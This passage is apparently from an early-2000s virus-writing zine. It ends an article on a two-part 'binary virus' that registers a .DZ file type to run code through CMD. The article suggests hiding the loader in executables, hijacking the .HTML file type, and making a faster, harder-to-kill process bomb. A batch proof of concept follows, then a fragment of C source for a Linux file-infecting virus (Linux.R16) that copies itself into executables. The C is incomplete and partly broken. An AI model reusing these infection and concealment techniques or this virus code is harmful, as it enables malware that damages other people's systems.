future research paths.
2. Description: r0bin-&-m4rian
---------------------------
r0bin & m4rian are the names of each part of our demostrative example. It is a basic
example. It lacks of self-replication and self-spreading abilities and it is harmless to
the system it runs on. Actually, once activated, it shows the following message:
echo --------------------------------------
echo m4rian,
echo.
echo I love you more than I can say.
echo I wish I could give you all my life.
echo.
echo r0bin
echo --------------------------------------
r0bin & m4rian can only be run over Windows NT and Windows 2000. I have released nothing
for
Windows 9x because it is trivial. The fact that I focus on Windows platforms does not mean
that this model cannot be implemented on non-Microsoft systems (let's say Unix and the
like).
2.1 r0bin:
r0bin is the first part of the pair. It's mission is register a new file type on a
Windows system. To be more accurate, it registers a .DZ file type and binds it to the
system shell command-line interpreter. Besides that, it also binds the file type with
a user-familiar desktop icon.
2.2 m4rian:
m4rian is a .DZ file that gets executed by the system command-line interpreter when
launched by the user. Given self-spreading and self-reproducing capabilities, they
would be built inside m4rian. On our case, this part has not been implemented.
As everyone can see, r0bin is the head and main part of the team. Without head, the
binary strategy is over.
This is the main problem and, at the same time, the main advantage of this approach.
Being required both parts, if one of them is not present, the other one goes useless,
or, being optimistic, held on waiting for the other to arrive.
When talking about plastic explosives, this is not a big problem, but it really is
on a distributed environment like a computer network. Both sides can reach to a system
on initially random moments with absolute independence. So, success is not guaranteed.
Besides that, it must be the user the one activating the bomb when trying to run
the .DZ file or that file type the worm's head had registered or redefined.
On the example shown before, r0bin is a .cmd file lacking any intention of hiding
itself from nobody. Nevertheless, in the case we want to introduce r0bin on one system
in a furtive manner, we can implement any or one subset of the well-known techniques
on the virii and trojan scene: inside an executable file (a patch, an installation
program, an active document, a multimedia presentation, etc.). Can you set gates to
imagination? ;)
r0bin's success is based on performing a legal operation on the user context running
it. That is why, its execution will be unnoticed to anyone on the system.
Opposite to this, m4rian needs to be a file of a certain type (as r0bin has registered
or defined). Well, ... this is not that true ... ;). Let's go on.
3.2 N-arian viruses. Weaknesses: Aquiles' toe:
May be you are wandering if n-arian viruses might exist. The answer is yes. But, due
to their strong dependency from external factors, nobody can guarantee their surviving.
In my honest opinion, they don't seem to be viable projects.
Though, 3-arian (ternarian) viruses, can result really interesting due to the
possibilities opened by code micro/emulation. On this particular case, r0bin, besides
installing the entry point to m4rian, would also drop and install the interpreter,
engine or virtual machine (VM) able to run m4rian successfully.
By code emulation we understand that either the languaje or the program code are
propietary. They can only be understood under the platform that the virus is by itself.
The same happens when considering the virtual machine approach: the bit-chain which is
in m4rian is p-code of an unknown, non-standard and proprietary VM. Only the virus
creator/owner knows its specificaion. To read more about micro/emulation, you can
read 'Microemulación y Seguridad': http://www.deepzone.org/editions/others/microem.htm
Then, on this particular case, we can assume a weaker but more powerful virus. Its
surviving possibilities decrease, but its ability to go unnoticed is considerably
greater.
Until this moment, we have seen how r0bin & m4rian have their code uncovered. This is
not positive. The essence of a binary virus is to pass unnoticed, so clear text code
is not desireable.
Computer science history shows lots of ways viruses use to hide themselves from
antivirus and protection systems sight. These techniques can be applyed to r0bin
without
restrictions. r0bin can be shipped inside any executable object.
Now, we have m4rian. How to or hide something that must be executed directly (shell
script code, WSH, VBA, etc.) and which is delivered to the victim as an stand-alone
file.
We could think on m4rian implementations living inside HTML note tags as part of a
new file type readable by the locally installed browser.
Let's suppose r0bin registers the extension .DZHTML. We should also have registered the
proper MIME type to have the browser read the file. In this case, we need to process
the note tags before the browser takes place.
One option is to use emulation and have r0bin install an interpreter on the system.
This component would give control to the browser inmediatly after processing note tags.
To achieve it, it would be as easy as calling the interpreter at the 'open' action of
the MIME type assigned to .DZHTML.
Depending on the source of m4rian's file would be necessary to set the MIME type also
on the server side. But, of course, this is not a compolsory restriction.
Now, let's think for a while the case of redefining the .HTML file type and its MIME
type definition ... ;)
We can create similar approaches to different data types. The web case is specially
interesting because allows m4rian to come from completely unexpected sources.
r0bin & m4rian take the file type registration as the entry point. Nevertheless,
Windows
registry, INI files, INF files, etc. are full of surprises to be discovered and
operations
that any user can legaly perform remaining unnoticed to any looker eyes.
It is fairly possible that, over the following months, we assist to new ways of
creating an
entry point and interesting binary exercises.
Depending on how the file type registration has been made, it is very easy to create
an endless recursive process. This will lead to process creation and progressive
memory usage on the operating system: a clasic process bomb. This is one of the
undesireable effects of r0bin & m4rian: a delayed bomb.
Let's see an example: if when registering the .DZ file type, we select as the program
to be launched to read that file: "CMD /C %1", this is, step by step, what will happen:
i. On trying to lauch the .DZ file, the system will look up for that file type on
on the registry.
ii. The system finds one entry for .DZ file type and tries to execute the program
associated to it
iii. The system creates a new process.
iv. Over that new process, the system will launch CMD.EXE.
v. CMD.EXE will try to execute 'm4rian.dz', which is the file he was given as first
parameter (%1).
vi. We return to step 1 until system resources get exhausted.
This situation appears on every case where the file type registration follows the
structure: <ext> => <program> <parameter.ext>. So, if we don't want r0bin & m4rian to
enter an infinite loop, we need to introduce an end condition inside r0bin. One option
is to rename the file hosting m4rian and then run the renamed version.
On the other side, if what we really want is to create a process bomb, methods for
faster resource exhaustion can be studied, to minimize the victim's ability to stop it:
achieving geometric or logaritmic growth insted linear. Other point to take into
account
is to achieve process persistency to be able to block the resources it owns. For
example,
when talking about 'CMD /C', the process chain can be terminated by the user. But,
running 'CMD /K' would make the user to kill each process one by one to free the
resources
blocked by them.
r0bin is, clearly, the weakest point on the binary chain. Killed the head, killed the
tail. To make things easier, r0bin comes as or with executable content.
Privilege management on NT systems is useless most of the times, taking into account that
r0bin performs a legal operation for a plain user on a system. Windows 2000 'Users' group
cannot perform this kind of operations, so r0bin cannot run successfully under this
credentials. But, Windows 2000 is shipped with the 'Power Users' group as a backward
compatibility feature with NT 4 systems. This group has been granted with the same
permissions
the NT 4 'Users' group used to own. This is due to compatibility issues with legacy
applications. So, one member of the 'Power Users' group under Windows 2000 can run r0bin
successfully. Needn't to say that all Windows 9x systems are also affected.
Over Windows 2000, applications must follow the 'Windows 2000 Application Specification
Requirements'. When one application doesn't match this specification, there is no guarantee
about wheter that application can run successfully as a plain user under Windows 2000. This
is the case with lot of software developed for NT4 or earlier and currently running on
production environments. That is the reason why, on many systems, users have more
privileges
than those assigned by Windows 2000 by default. To look more information about this
particular aspect: www.microsoft.com/technet/win2000/win2ksrv/technote/secdefs.asp
5. Conclussion:
------------
The success of this kind of creatures will be determined by this two factors:
Unfortunately, the amount of Win9x users is really big, and the domestic uses of NT and
2000 is far long from responsible: the use and managing of privileges is not the
appropriate.
Anyway, binary worms and trojans are weak creatures. Time will say the role this kind of
programs will play on the virii ground.
--------------------------
Nemo - Nemo@deepzone.org
www.deepzone.org
DeepZone Digital Security
"The Deepest, The Highest"
--------------------------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BINVIRUS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[R0BIN.CMD]ÄÄÄ
@echo off
cls
rem --------------------------------------------
rem r0bin v1.0 - 2000/10/22
rem Nemo@deepzone.org
rem
rem To my beloved girl. I love you more than I
rem can say. Wish I could give you all my life.
rem
rem Script description:
rem Automatic registration of a new file type
rem for the current user profile.
rem
rem Files required:
rem associate-nt4.exe - NT4 Resource Kit
rem associate-w2k.exe - Win2k Resource Kit
rem
rem IMPORTANT NOTES:
rem This script is not a trojan horse nor an
rem i-worm. It is a 'proof-of-concept' to
rem show a new way to spread and run
rem potentially harmful code on any Windows
rem machine.
rem --------------------------------------------
rem --------------------------------------------
rem m4rian v1.0 - 2000/10/22
rem Nemo@deepzone.org
rem
rem To my beloved girl. I love you more than I
rem can say. Wish I could give you all my life.
rem
rem Script description:
rem Displays a message on the console and
rem removes the file registration previously
rem installed by r0bin.
rem
rem Files required:
rem associate-nt4.exe - NT4 Resource Kit
rem associate-w2k.exe - Win2k Resource Kit
rem
rem IMPORTANT NOTES:
rem This script is not a trojan horse nor an
rem i-worm. It is a 'proof-of-concept' to
rem show a new way to spread and run
rem potentially harmful code on any Windows
rem machine.
rem --------------------------------------------
echo --------------------------------------
echo m4rian,
echo.
echo I love you more than I can say.
echo I wish I could give you all my life.
echo.
echo r0bin
echo --------------------------------------
echo.
// Include filez
#include <stdio.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
ssize_t ret;
int handle, bytes , retn;
char *buff[256];
char *ch,virus[VirusSize];
struct dirent *dirp;
DIR *dp;
char pathname[1024];
handle = open(argv[0],O_RDONLY);
read(handle,virus,VirusSize);
handle = creat ("/usr/sexloader",7);
if (handle == -1) {
printf("uf!");
}
write(handle,virus,VirusSize);
write(handle,virus,VirusSize);
write(handle,virus,VirusSize);
handle = open("/usr/tmp001x.not",O_RDWR);
if (handle == -1) {
handle = creat ("/usr/tmp001x.not",0);
if (handle == -1) {
exit(0);
}
printf ("\n\n");
printf ("\t\t""Linux.R16 by Radix16[MIONS]" " \n");// (c)oded
printf ("\t\t""I'am free virus for Linux :)" "\n");// Print text (textrezim)
printf ("\t\t""Made in Czech republic" "\n");// My World
printf ("\n\n");
exit(retn);
readdir(dp); readdir(dp);
while (1) {
if ((dirp = readdir(dp)) == NULL) {
closedir(dp);
return(0);
}
if (access(dirp->d_name,X_OK | W_OK) < 0) {
exit(-1);
}
write(handle,virus,VirusSize);
}
close(handle);
exit(retn);
// End program(virus)
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[R16.CPP]ÄÄÄ